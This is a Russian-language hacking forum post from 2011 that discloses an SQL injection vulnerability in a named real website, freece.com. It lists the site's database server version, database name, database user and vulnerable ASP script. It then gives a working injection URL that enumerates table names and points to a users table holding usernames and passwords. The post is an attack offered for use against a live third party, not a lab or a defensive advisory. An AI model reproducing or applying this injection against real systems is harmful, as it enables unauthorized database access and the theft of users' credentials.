Показать сообщение отдельно

  #3  
Старый 30.04.2011, 08:43
eclipse
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами: 8103926

Репутация: 85
По умолчанию

Freece.com : PR - 4

MSSQL VERSION:Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 (Build 7600: )

DATABASEharmcon

USERNAMEharmCon_reader

VULN SCRIPT PATH:\www\FreeCE_classic\www\forum\Forum_Details.a sp

Exploit:

Цитата:
Сообщение от None  
http://www.freece.com/forum/Forum_Details.asp?dbForumID=1+or+1=(SELECT+TOP+1+T ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_NAME+NOT+IN+('vwCertInvoice','tbBlogRSS','tbCou ntry','vwClassQuestion','vwEventEval','tbCardType' ,'vwInvoice','tbCCIDcodes','vwClassQuestionResults ','tbCCTranType','tbClassAnswers','tbClassChoice', 'tbCertRequest','Temp','tbClassGrade','tbInstructo rApprove','tbeTrack','dtproperties','tbClassQuesti on','tbInstApproveDetails','TEMP_NewLogins','tbMem AutoRenewTrack','tbDocuments','tbInvoice','tbEmail Addresses','TEMP_NewState','tbEmailJob','TEMP_Stat eCodes','tbEvaluation','TEMP_ZipCodes','tbEventDoc s','TEMP_NewEmails','tbEventHomePage','TEMP_Countr yCodes','tbCustomerImportRoles','tbCustomerMailLis t','tbEventType','tbEvMailDocs','vwBrokerReportInv oice','tbFilter_Competitor','tbFilter_DirtyWord',' tbOutComeSurvey','tbMailRefer','tbForum','tbForumM essage','tbInstructorConflict','tbInstructors','tb MemberPackage','tbOnLocationClasses','tbSurveyPart icipants','tblForums','tbInstHonorStatus','Temp_Jo sh','tbLinks','tbInstHonorDetails','tbMemberCoupon ','tbLiveChat','tbInstHonorarium','tbLiveImages',' i td..'))--
IMPORTANT TABLES:

tbEmailAddresses

tbForum

tbInstructors

tblUsers

-User_ID

-UserName

-Password
 
Ответить с цитированием